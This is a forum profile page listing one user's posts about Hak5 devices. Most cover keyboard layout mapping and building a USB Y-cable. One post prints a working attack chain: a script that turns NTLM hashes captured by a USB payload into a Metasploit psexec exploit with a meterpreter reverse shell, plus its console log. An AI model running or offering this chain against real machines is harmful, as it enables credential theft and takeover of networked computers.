Jump to content

Maestropastelero

Active Members
  • Content Count

    10
  • Joined

  • Last visited

About Maestropastelero

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. GhostGuy9 this sounds pretty interesting to me, do you mind to share your code? or at least point me out on the right direction to accomplish that. thanks
  2. Hi Semefi I am from Chile, but we use the same key mapping, would be really helpful if you can share your mapping config with me, even if you still have some characters issue, that's better than the current es-la config file on the wiki. thanks
  3. This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested. I 've used Metasploit in a Kali laptop with a post mimikatz module loaded and dump NTLMv2 hashes fine. Takes a Superuser account hash, and use exploit/windows/smb/psexec for accessing other computers on the same network. Then I realize I can setup msf on my BB. Running V1.3 on my BB, I setup Metasploit following this guide : https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros First, it melt my brain as it didn't work and I am not super skilled on this matters, but after some Gems uninstall/install/downgrade I finally make it works. Then I used the quickcreds payload for getting the hashes through the USB and when that is done, I build a RC file that it pass to the msfconsole -r. So far so good. Metasploit takes like 1 minute to load, but it works. The problem is when it try to exploit it, I always get Login Error : execution expired The main question is: are the hashes on hashdump somehow different than the hashes that quickcreds provides? (I hope that don't sounds too newbie) Or anyone see anything bad on what I am doing here? This is the log I got from metasploit : =[ metasploit v4.15.7-dev-70a82b5 ] + -- --=[ 1674 exploits - 960 auxiliary - 295 post ] + -- --=[ 489 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1 LHOST => 172.16.64.1 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443 LPORT => 443 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10 RHOST => 172.16.64.10 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername SMBUser => myusername resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN SMBDomain => OFFICEDOMAIN resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j [*] Exploit running as background job. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20 [*] Started reverse TCP handler on 172.16.64.1:443 [*] 172.16.64.10:445 - Connecting to the server... [*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'... [-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired --------------------------------------------------------------------------------------------------- This is what I added to the payload to test it (ugly code, it is just a test): echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt export HOME=/root source /etc/profile.d/rvm.sh cd /root/metasploit-framework/ ./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log
  4. Anyone?, just a little help to understand the mapping ? :)
  5. Can someone please give me a hand with the keyboard layout, is impossible to get any payload to work with this one. On my country we use ES-LA layout (Spanish, Latin) and every time the BB sends a \ the computer gets a : - " if I use the ES language setting. - } if I use the US one - And nothing happens(or at least it don't send any QUACK command) if I set the recently added ES-LA. (https://raw.githubusercontent.com/hak5/bashbunny-payloads/master/languages/es-la.json) For adding the language I am adding the raw json file into D:\languages\ and modifying the config.txt file to use it. Here is an example output for running something under windows : RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\file.cmd')" turns into powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads"switch2"file.cmd') As you can see it prints " instead of \ This is the layout for every ES-LA keyboard, but I can't figure out how to do the mapping. I 'll appreciate any help on this
  6. Finally I did the cable, just 1 female and 2males I Remove the rubber from the 2 power cables in the middle section an attach a second male usb cable (solder red and black ones), some tape stripes and everything seems to work fine. I prefer to have a new cable rather than this, but in the meantime I am going to use it some weeks as it works just fine. thanks Matias.
  7. Maybe I didn't explain enough that I live ouside US , and there is no amazon here. Or you just didn't read the whole post where I wrote amazon don't sell overseas usb cables like this one (already tried all that says power enhanced) The only way to buy it online and ship it down here(Chile) is to add at least 40 bucks to be delivered before 20 days. So is not the best option at this point. Just wondering is somone knows the internal structure of this Y USB cable to just build one while waiting until a new one arrives.
  8. I just got a second hand Nano from ebay and it didn't came with any cable or instruction, just the nano and antennas. (so lame I know, but it came in a bundle with something else I needed) I haven't even power it yet, but from google pictures I saw the Y cable should be like female USB A to 2x male USB A,. I start looking on local market but haven't found any on my country yet, and Amazon don't ship them outside US either. I will figure out where to buy it, but in the meantime, what do you thing on building it for start using the Nano ? This video shows 1 USB extension split and joined again by colors, and then just add an extra USB male cable adding only the powers color cables. Thoughts?
×
×
  • Create New...